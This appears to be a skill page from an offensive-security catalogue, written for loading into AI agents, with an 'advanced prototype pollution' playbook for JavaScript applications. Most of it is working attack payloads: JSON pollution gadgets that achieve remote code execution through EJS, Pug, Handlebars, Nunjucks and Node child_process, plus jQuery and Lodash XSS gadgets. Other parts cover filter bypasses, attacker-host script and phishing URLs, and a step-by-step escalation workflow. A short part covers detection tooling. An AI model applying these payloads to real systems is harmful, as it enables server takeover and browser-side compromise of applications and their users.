Loading...
Loading...
Advanced prototype pollution playbook — server-side RCE, client-side gadgets, filter bypasses, and detection techniques. Companion to ../prototype-pollution/ for basics. Use when you've confirmed pollution and need to escalate to code execution or find framework-specific gadgets.
npx skill4agent add yaklang/hack-skills prototype-pollution-advancedAI LOAD INSTRUCTION: Advanced prototype pollution escalation. Covers server-side RCE via template engines (EJS, Pug, Handlebars), Node.js child_process gadgets, client-side script gadgets, filter bypass patterns, and systematic detection. Load ../prototype-pollution/SKILL.md first for fundamentals (merge sinks,vs__proto__, basic probes).constructor.prototype
child_process.spawnchild_process.forkenvshellObject.prototype// Vulnerable pattern (very common):
const { execSync } = require('child_process');
execSync('ls'); // inherits shell, env from prototype
// Pollution for RCE:
Object.prototype.shell = '/proc/self/exe';
Object.prototype.argv0 = 'console.log(require("child_process").execSync("id").toString())//';
Object.prototype.NODE_OPTIONS = '--require /proc/self/cmdline';
// Next child_process call executes attacker code{"__proto__": {"shell": "node", "NODE_OPTIONS": "--require /proc/self/cmdline"}}render()optsoutputFunctionName// Pollution payload:
{"__proto__": {"outputFunctionName": "x;process.mainModule.require('child_process').execSync('id');s"}}
// When EJS renders ANY template after pollution:
// Compiled function includes: var x;process.mainModule.require('child_process').execSync('id');s = "";
// → RCEres.render()block{"__proto__": {"block": {"type": "Text", "val": "x]);process.mainModule.require('child_process').execSync('id');//"}}}self{"__proto__": {"self": true, "line": "x]});process.mainModule.require('child_process').execSync('id');//"}}typeprogram{"__proto__": {"type": "Program", "body": [{"type": "MustacheStatement", "path": {"type": "PathExpression", "original": "constructor.constructor('return process.mainModule.require(`child_process`).execSync(`id`)')()","parts": ["constructor","constructor"]}, "params": [], "hash": null}]}}allowProtoMethodsByDefault{"__proto__": {"allowProtoMethodsByDefault": true, "allowProtoPropertiesByDefault": true}}
// Then use {{#with this as |obj|}}{{obj.constructor.constructor "return process.mainModule.require('child_process').execSync('id')"}}{{/with}}{"__proto__": {"type": "Code", "value": "global.process.mainModule.require('child_process').execSync('id')"}}res.render()app.localsres.locals{"__proto__": {"view options": {"outputFunctionName": "x;process.mainModule.require('child_process').execSync('id');s"}}}$.extend(true, {}, userInput)// Pollution:
Object.prototype.innerHTML = '<img src=x onerror=alert(1)>';
// Trigger: any jQuery DOM manipulation that reads innerHTML from prototype
$('<div>').appendTo('body'); // may use polluted property// Vulnerable functions (deep merge):
_.merge({}, userInput)
_.defaultsDeep({}, userInput)
_.set(obj, path, value) // if path is attacker-controlled
// template() gadget:
Object.prototype.sourceURL = '\u000ajavascript:alert(1)//';
_.template('hello')(); // sourceURL injected into Function constructorObject.prototype| Framework | Gadget Pattern | Polluted Property | Impact |
|---|---|---|---|
| jQuery | | | XSS |
| Angular.js | | | XSS |
| Vue.js | Template compilation | | XSS |
| Ember.js | Component rendering | Various view properties | XSS |
| Backbone.js | | | XSS |
Object.prototype.src = 'https://attacker.com/evil.js';
Object.prototype.href = 'javascript:alert(1)';
Object.prototype.action = 'https://attacker.com/phish';
// Any dynamically created element may inherit theseStep 1: Inject and check
POST /api/endpoint
{"__proto__":{"polluted":"yes"}}
Then: GET /api/anything
Check if response contains "polluted" or behavior changes
Step 2: Error-based detection
{"__proto__":{"toString":1}}
→ If server crashes or returns 500, toString was overwritten
{"__proto__":{"valueOf":1}}
→ Same crash-based detection
Step 3: Response differential
{"__proto__":{"status":555}}
→ Check if HTTP status code changes to 555
{"__proto__":{"content-type":"text/plain"}}
→ Check if Content-Type header changes// In browser console after interacting with the app:
Object.prototype.testPollution
// If returns a value → something polluted the prototype
// Automated: override defineProperty to detect writes
Object.defineProperty(Object.prototype, '__proto__', {
set: function(v) { console.trace('PP detected!', v); }
});| Tool | Type | Purpose |
|---|---|---|
| PPScan | Burp Extension | Scans for server-side PP |
| server-side-prototype-pollution | Burp Extension (Gareth Heyes) | Advanced server-side PP detection with multiple techniques |
| ppfuzz | CLI | Fuzz for client-side PP via URL fragment/query |
| ppmap | CLI | Map client-side PP to known gadgets |
__proto__// Instead of:
{"__proto__": {"polluted": "yes"}}
// Use:
{"constructor": {"prototype": {"polluted": "yes"}}}?constructor[prototype][polluted]=yes
?__proto__[polluted]=yes
?__pro__proto__to__[polluted]=yes (if filter strips __proto__ once){"__proto__": {"a": 1}}
{"constructor": {"prototype": {"a": 1}}}
{"__proto__\u0000": {"a": 1}}Object.assign1. Find merge sink (../prototype-pollution/SKILL.md Section 0)
└── JSON body parsed and deep-merged into server object
2. Confirm pollution:
└── {"__proto__":{"testxyz":"1"}} → check if testxyz appears globally
3. Identify technology stack:
├── Express + EJS → outputFunctionName gadget (Section 1.2)
├── Express + Pug → block gadget (Section 1.3)
├── Express + Handlebars → type/program gadget (Section 1.4)
├── Any Node.js with child_process → shell/NODE_OPTIONS (Section 1.1)
├── Client-side jQuery → DOM gadgets (Section 2.1)
├── Client-side Lodash → template/sourceURL (Section 2.2)
└── Unknown → try KNOWN_GADGETS.md systematically
4. Craft RCE/XSS payload matching gadget
5. Verify with safe payload first (sleep / DNS callback)
6. Escalate to full RCEConfirmed prototype pollution?
│
├── Server-side or client-side?
│ │
│ ├── SERVER-SIDE
│ │ ├── Template engine in use?
│ │ │ ├── EJS → __proto__.outputFunctionName (Section 1.2)
│ │ │ ├── Pug → __proto__.block (Section 1.3)
│ │ │ ├── Handlebars → __proto__.type (Section 1.4)
│ │ │ ├── Nunjucks → __proto__.type (Section 1.5)
│ │ │ └── Unknown → try each gadget from KNOWN_GADGETS.md
│ │ │
│ │ ├── child_process used anywhere?
│ │ │ ├── YES → __proto__.shell + NODE_OPTIONS (Section 1.1)
│ │ │ └── MAYBE → inject and trigger error to reveal stack
│ │ │
│ │ └── No known gadget?
│ │ ├── Try status code pollution: __proto__.status = 555
│ │ ├── Try header pollution: __proto__.content-type
│ │ └── Check KNOWN_GADGETS.md for framework match
│ │
│ └── CLIENT-SIDE
│ ├── jQuery loaded?
│ │ ├── YES → $.extend deep merge + DOM gadgets (Section 2.1)
│ │ └── Check ppmap for automated gadget detection
│ │
│ ├── Lodash loaded?
│ │ ├── YES → _.template sourceURL gadget (Section 2.2)
│ │ └── _.merge as both sink AND gadget
│ │
│ └── Framework (Angular/Vue/Ember)?
│ └── Script gadget lookup (Section 2.3)
│
├── __proto__ keyword filtered?
│ ├── Try constructor.prototype (Section 4.1)
│ ├── Try bracket notation (Section 4.2)
│ └── Try JSON key variations (Section 4.3)
│
└── Not confirmed yet?
└── Go back to ../prototype-pollution/SKILL.md for detection// EJS RCE
{"__proto__":{"outputFunctionName":"x;process.mainModule.require('child_process').execSync('id');s"}}
// Pug RCE
{"__proto__":{"block":{"type":"Text","val":"x]);process.mainModule.require('child_process').execSync('id');//"}}}
// child_process RCE (Node.js)
{"__proto__":{"shell":"node","NODE_OPTIONS":"--require /proc/self/cmdline"}}
// Lodash template XSS
{"__proto__":{"sourceURL":"\u000ajavascript:alert(1)//"}}
// Filter bypass (constructor path)
{"constructor":{"prototype":{"outputFunctionName":"x;process.mainModule.require('child_process').execSync('id');s"}}}
// Safe detection probe
{"__proto__":{"pptest123":"polluted"}}